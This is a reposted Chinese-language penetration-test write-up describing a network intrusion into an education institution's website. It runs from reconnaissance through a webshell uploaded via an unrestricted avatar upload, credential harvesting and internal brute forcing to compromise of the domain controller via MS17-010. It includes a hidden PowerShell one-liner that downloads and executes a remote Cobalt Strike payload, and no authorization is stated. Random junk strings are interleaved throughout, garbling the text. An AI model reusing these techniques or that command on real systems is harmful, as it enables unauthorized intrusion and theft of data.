' z) @* t$ s. x; G1 d
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路# ]- w0 ^. J& S) t# s
* u: u' [2 A6 k( i Z+ q
7 G. P+ Z" U% @) f* |. a
$ y: X3 m2 q# t# k- U" Z
0 z. Z% q+ z& J( d: B J& a: C
+ D* B& p* D$ L4 @& u2 a 正文( T3 B; H% @ j! t9 }3 o
S/ L# n5 e. N( T" y6 g3 W( M
' `- H( l8 o( b , E6 M+ P3 h/ l s
! D b1 a+ U& U& [/ c. }
$ s* e+ v* J3 Z( K/ q, X& M; e ? 目标:www.xxxx.com(一家教育机构) + @# a: F a- [9 M5 a+ k
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能& i9 M7 a: {9 ?& ]0 X! y* L5 `
2 ^% l; D8 J7 Y: Z. r/ u0 e. I7 p6 C
# a! V( r( V4 }" S7 U
9 e i" ~* ^% r. a! K% p. |/ `/ y# V; ?6 q" B
进行了简单的信息搜集
; l2 q* i. v7 ?: E( `* @! i- i6 M
' A7 e9 V6 U* ~ Y
% n( G6 f$ o9 z5 N) I7 I# e ' ?9 ]8 y+ Q7 u& x7 }
! h; t8 M8 u. B1 [3 k
子域名搜集# l5 D8 U' c- ?, ^
( ]' c& r* z/ V. C* g3 D, }
u1 V. ?0 Z- E- h% A; O
$ c8 f" ~: B/ H* W7 F 8 O& v$ j7 A% u, {- Q
: n1 @( N& L+ F% k6 i5 t ? fofa找资产 : t( M3 r& v7 z- R: Y; O. M# g
4 q" J' m" r+ O' m4 B, v
. K0 E7 c' q+ r" Z: W
+ z& n% P1 P: Q) K: T- L
7 m+ G$ Q; Z$ t3 }+ K6 r R+ M `& Z: n) Y2 q
7 a; `2 S6 N( f3 k% l2 e, j2 z$ B% |
3 x9 s$ u* L$ V T 一共七个资产。去重之后只有两个。
" C3 F; R3 ?8 @$ e# `0 y
3 J" ~" Y) S1 h$ a; F& x
# ], @4 f/ q8 F1 q5 ? N5 j3 K
5 [8 @. @0 v4 h* K! ^
" Q; S- D9 V& u8 l6 u9 c 目录探测" |& u% o$ C) g: @# P
4 u1 k# f! x; |, G. \0 k# ?
0 P( ]0 ]# q: c; j 7 E# N* N# ?" o. L" q% a
' z7 z5 C! T9 ^/ H5 X+ k- g
& D, \' R/ r1 p; C% S2 ^9 D O8 ^ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 3 X& y6 [: f/ G; x y" p' J
4 j/ y+ e/ D3 d" @; |1 _
( F; Z+ V: s. m) M. J2 M' ? . F8 `2 ^/ B* ]9 F5 V# E6 }& i9 Q
! t( a, d, P* z( B$ a 我又尝试了通过修改返回包来绕过登录界面
. [% H, q( c/ I& J 0 y6 Z! m7 c- B+ g" m+ D% p) X* V2 _+ t
) O% w0 W! y& _! i k( d2 U) D * J# x! {6 t$ m2 b6 {# [
: P9 O- K6 a: R( o7 g
! V- g) X# Q% ]" Z) @% y. V( ] 还是不行,尝试注入无果* d& L; W$ F9 R- N4 Y3 O
* b# S9 \: p4 c# e
+ h+ C2 a) Z0 |9 u
" i5 j* e9 B8 R2 j2 T4 H5 E
: N2 \! f- c* N8 L) c1 t; x+ F$ J! ~: e$ r3 @5 Q
不过我目录探测出了一处Spring信息泄露 " F# [7 R2 L4 ]* x, F! V. w
% K# t; O3 Z1 c2 [& m4 z
4 D2 q% C, N! y; P9 w , p; k$ @0 _+ O; H& m
}" n2 T$ w2 T3 w2 d2 ?' r3 K* T- G
$ Z7 d; B: \ {' {0 }1 [1 f ) n. C/ B& ?) i* _1 g( ^, i1 }
. s6 F4 [) P b 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录& v7 q @5 V* R. ^. p- N* F
( W2 t- T. u* k6 A) B7 Z
0 v5 w/ q: A( H- q
* N+ A. ~4 Z) H
, {# T& ?& A* J7 z4 h" R" X9 A9 q2 m: h P
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。+ f6 S3 I3 e3 @
; G9 ?: h6 Q; C% M! L* w+ H4 e) j' F, p" I2 K
: h4 H5 a+ p" G e L
' [$ }7 @3 `$ p6 ]: X) \& p! B8 ^; ?. N" o3 ]
获取有些师傅到这一步就手机抓包电脑测了。2 v- X! R/ @. {. _( X
. t: @/ \0 M) q" F! l+ C3 Q
: W* l* S' p+ T5 ~ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
* G2 x3 A9 F \% Y' ^- d: m
. t$ F1 E5 F: s# n- s7 _4 r0 H: J9 h* H3 H6 O" Z
其中在一个公众号发现了小程序,可以进行注册。 z- V" {' b7 b/ T- J, {% M
8 ] Q, g( w- @ e0 g# Y o
! \8 k/ ?- n/ `, ^ 看到了头像上传,尝试上传获取WebShell
5 V g- ?: _' Q$ ^/ h8 S( I
9 N" d+ q7 _0 @5 V @& }
0 b3 h1 T( f$ U( { B# D % p: J# M5 q9 J9 b8 j6 M
( s7 J+ A* _7 M4 u1 v2 ^) D! T3 B, U& x) b5 _3 @& u9 W9 j/ E
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
' J; M+ T( {5 E5 {1 B8 g4 Y
3 k }% I! p. K0 f ~5 J; H: K1 e1 b" r7 s0 d6 ?
1 H3 b- ]- t/ w4 r+ @( h
g. n8 ^7 d, L# E' b, V' r' I* w9 {0 K
然后上了大马
( P& `+ H: e% r. S
. e9 z( c4 o4 N& }
' R( J' I! e8 {" F 0 O% ~# e3 L1 p
" L( D, J/ d+ R+ p w3 `7 t. T& Q D7 J8 @9 {! y6 R4 d0 V
9 [9 a) O. @8 @& w1 g6 p3 i : ]: P* z7 s. }/ s
. j# z. m& c! T# [. ` b- `( Q5 f 通过翻找文件发现数据库账号密码
5 \0 {* I( Z, {& a1 N
' J" p* s' ~; @! U- b) p* ]6 T o/ Y5 u
. O. G/ }+ {5 u( O o$ g $ u: \- }, z) T3 G s& w; {; R
4 x6 t1 P9 v7 A6 B0 X --内网渗透3 ] V( T! }" b. g9 Q/ X
4 r# _# m2 @) c, U! y# r2 n/ Q2 \1 ]8 o
直接通过powershell执行 cs上线
* |& S1 u% X- B* A
1 M0 K/ N/ M. h+ _+ k4 J! l. w: W& P5 k" z3 J# O# ?
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
5 U6 g1 n7 c2 m6 |8 R$ |) _ # B3 r' j% i# e5 _
) c) @7 s$ D! H
, }! U' ?( Q5 ^
0 R8 \% |5 A; Y4 @
, x" d& t. k5 k7 m' ] 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破2 r; ]% Q/ c+ W% r+ `8 G/ O/ x
* \% u, r* ~& h. L" y
. a! i! j* a9 f! K9 E
6 R* p- a8 h1 S- S4 g
" n& J) Y; \ v3 s
. w k, T* I! o, a6 D7 Q" l) D" a 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 . t) Z0 n3 \5 K# y$ M; @3 y5 s
# G: h# |; l+ ]4 Z8 C8 a5 U8 W
* I$ d8 u8 U/ A. e, ^: [
7 {& F# j) v; [# o, ` 9 d' s J5 U7 T5 ^ }0 B
@; I4 q+ H% {! [( m/ v, W3 p" z: t
) A8 W+ I% B% Y$ k# Y. U2 _6 F8 L
( N' I% n/ z, p, \2 \2 T9 v$ T
, g5 \" X& f6 I6 h3 c! l4 _
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
- ?" y. b# A* y$ r+ ?$ q 7 q8 A5 n) {* m8 U2 C
; l0 @5 H( b0 P' ~ 9 n) e' V5 @, I
! p9 n s5 [ o- c ' [7 v4 R. \2 P5 N# P% O9 U
, p, k$ q% g# ^8 ?) R7 _+ Z; E$ l+ D
5 T0 u" n4 r3 w7 N
6 l. H2 f$ t$ H9 Y* S
" x* n! T8 M" a( C
5 E9 F/ U$ c( y9 t+ Y
7 \: H* O. {2 C( p- [ # G* z) L* E; x& `& A1 s8 Q9 y
5 ~: O: m: R8 T2 z \. Z& X5 C: m$ w, k7 r5 ?8 m5 m4 H
小结7 @2 `% _' d& Q
) R7 B7 W# k; w
( k9 R/ n" [* s: D * Z- f; |1 E {! }
/ u k/ w% e; [6 C# Q3 Y: c% q; A. S' u7 l- z2 W4 L
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
R6 e* F- w4 k % e. A9 S7 g3 |) x$ d
6 X& l& Q5 t! n1 A9 d8 n: k
7 Y% V6 ?! |1 K% c& Q
$ {( G- Y# k% p' E9 U z1 [5 n4 h9 q# M0 z. [' W R% m- l
- 7 H) |1 F8 n3 e( x
1 g6 P& z- B# c! w0 i4 ~) p, F/ G
1 D8 L2 A l) r4 y -
* T2 |; h8 {/ T# s 3 f8 n) k5 i* {/ F
D7 w0 ]4 M8 p2 ]3 j2 ]
( A4 B; G+ F9 L5 }8 J# v& D' Z5 `9 h0 a/ R. x
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
& _+ i0 P- b# V9 |, h 7 L6 n" T% D9 j6 C
- a/ q, R- B! \9 J2 m
8 [6 \+ ?. V1 }7 c6 q0 @; X6 m
|